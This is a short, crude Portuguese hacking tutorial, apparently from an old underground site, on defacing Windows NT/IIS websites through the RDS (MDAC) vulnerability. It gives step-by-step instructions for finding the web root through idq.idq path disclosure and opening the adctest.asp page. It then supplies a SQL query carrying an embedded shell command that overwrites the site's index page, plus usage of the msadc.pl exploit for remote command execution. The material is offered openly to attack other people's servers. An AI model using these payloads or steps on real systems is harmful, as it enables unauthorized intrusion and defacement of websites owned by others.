invadindo por rd's

invadindo por rd's


Obs.: Só funciona se o provedor usar Windows NT.
Essa porra é usado pra hackear paginas , pra isso vc precisa saber a pasta que se encontra o index ou default, bom na maioria dos casos é só digitar wwww.servidor.com/idq.idq, ai aparece a bosta do diretorio!, geralmente é c:InetPubwwwroot , bom ai tem que descobrir se o servidor usa index.asp,index.html,index.htm e mesma coisa com default.
Bom exemplo, como faço? assim, www.servidor.com/idq.idq ou ida.ida ou idc.idc, bom ai vou ver o diretorio.. anoto num txt, agora só decobrir se é index ou default e qual a extensão, bom só testando.. www.servidor.com/index.extenções possiveis ; ou www.servidor.com/default.exetenções possiveis , bom qual entrar é o certo ai é só anotar, vamos supor que o diretorio é :
c:inetpubwwwrootindex.htm, ai depois de ter achado isso entra na tela do RDS, ou seja www.servidor.com/msadc/samples/adctest.asp, e vai aparecer a tela do RDS, agora apague tudo que tiver escrito no query e digite:
Select * from Products where ProductType='|shell("cmd /c echo (O QUE QUER QUE APAREÇA NO SEU HACKED) > c:InetPubwwwrootindex.htm")|'
Depois é só apertar RUN e pronto!, agora vamos se por que vc quer evitar tudo isso, é so pegar um exploit chamado msadc.pl e pronto.. vc usa assim:
perl msadc.pl -h www.servidor.com , se aparecer cmd , vc digita :
(O que quer escrever) < C:InetPubwwwrootindex.htm (enter) só isso amigos.. bom aproveito, para ver se o servidor tem o bug do RDS é testando com o msadc/samples/adctest.asp ou passando um scaneador de vulneralidades! (gosto do nessus pra linux),pega ele em www.nessus.org.